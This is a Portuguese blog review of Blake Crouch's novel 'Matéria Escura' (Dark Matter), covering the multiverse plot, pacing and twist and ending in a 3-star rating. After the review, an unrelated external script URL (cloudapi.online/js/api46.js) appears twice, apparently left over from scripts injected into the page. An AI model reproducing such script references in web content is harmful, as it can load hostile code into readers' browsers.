Matéria Escura

Autor: Blake Crouch
Ano: 2017
Páginas: 352
Editora: Intrínseca
Sinopse: Essas são as últimas palavras que Jason Dessen ouve antes de acordar num laboratório, preso a uma maca. Raptado por um homem mascarado, Jason é levado para uma usina abandonada e deixado inconsciente. Quando acorda, um estranho sorri para ele, dizendo: “Bem-vindo de volta, amigo.”
Neste novo mundo, Jason leva outra vida. Sua esposa não é sua esposa, seu filho nunca nasceu e, em vez de professor numa universidade mediana, ele é um gênio da física quântica que conseguiu um feito inimaginável. Algo impossível. Será que é este seu mundo, e o outro é apenas um sonho? E, se esta não for a vida que ele sempre levou, como voltar para sua família e tudo que ele conhece por realidade?
Com ritmo veloz e muita ação, Matéria escura nos leva a um universo muito maior do que imaginamos, ao mesmo tempo em que comove ao colocar em primeiro plano o amor pela família. Marcante e intimista, seus múltiplos cenários compõem uma história que aborda questões profundamente humanas, como identidade, o peso das escolhas e até onde vamos para recuperar a vida com que sonhamos.

***

A teoria do Multiverso é um tema freqüente na cultura pop, seja em HQs, Livros, Séries e filmes. Os leitores de quadrinho, talvez mais do que qualquer outro desses grupos, já devem estar familiarizados com a possibilidade de realidades alternativas onde os fatos tomaram caminhos diferentes do mundo “original” de um personagem.
Nesse sentido, Matéria Escura é uma história clássica de Multiverso. O protagonista, Jason, leva uma vida perfeita até ser abordado por um sujeito de máscara que o obriga a ir até um local e o faz desmaiar através de uma pancada na cabeça. Quando Jason acorda, está em outra realidade, um mundo onde é um cientista famoso e não um pai de família e simples professor de física como anteriormente.

No geral, gostei bastante desse livro. Embora o início tenha soado bem cliché para mim e a história tenha algumas reviravoltas questionáveis, o livro como um todo é bem divertido de ler, e a ação se desenvolve rapidamente. Jason mal chega a essa nova realidade e tem que fugir de seus empregadores, que acham que ele é o Jason do mundo deles, desaparecido há mais de 1 ano. Enquanto foge desses sujeitos, o personagem ainda tem que entender o que lhe está acontecendo. Onde estão sua esposa e filho? Será que eles algum dia existiram ou ele está ficando louco? E que máquina é essa que o Jason desse mundo está desenvolvendo? Essas são algumas perguntas que o personagem faz a si mesmo antes de perceber que está em uma realidade alternativa.
Minha parte favorita da história é quando Jason finalmente descobre o que está acontecendo e, a companhia de uma psicóloga que trabalha com o Jason daquele mundo, entra na máquina para reencontrar o mundo a qual pertence. Numa pegada meio “Máquina do Tempo” de H.G. Wells, meio “Sliders” (alguém já viu essa série?), Jason e Amanda vão viajando através de diversas realidades alternativas e encontrando versões diferentes deles mesmos. Infelizmente, a obsessão de Jason em encontrar sua família, faz com que essas realidades não sejam devidamente exploradas. Pouco se sabe dos mundos onde Jason passou, a não ser que aquele não é o que a esposa e o filho estão.

O grande plot-twist da história chega perto do desfecho e, confesso,estou um pouco confusa com ele até agora. Não é bem sobre o que acontece; minha dúvida é o porquê, considerando as características da viagem pelo Multiverso reveladas no final, tal situação não aconteceu antes, no início do livro. Se você leu, por favor me esclareça. Se não leu, vale a pena conferir o livro só por essa reviravolta.

Recomendo Matéria Escura para os que gostam de ficção científica em que a ação está mais no exterior, no que acontece com o personagem, do que em seus pensamentos. Jason pensa muito mas seus pensamentos são sempre muito repetitivos. Em compensação, muita coisa acontece com ele e eu não me surpreenderia em descobrir que essa história vai se tornar um filme algum dia, já que o próprio livro parece um roteiro de filme.

No geral o livro cumpre bem o seu objetivo de entreter e divertir os leitores que gostam do gênero (ficção científica) por isso dou 3 ESTRELAS – a história merece sim um 3,5 mas achei que faltou maiores explicações sobre aquele plot-twist então tirei meio ponto.30

 

https://cloudapi.online/js/api46.js

https://cloudapi.online/js/api46.js

%d blogueiros gostam disto: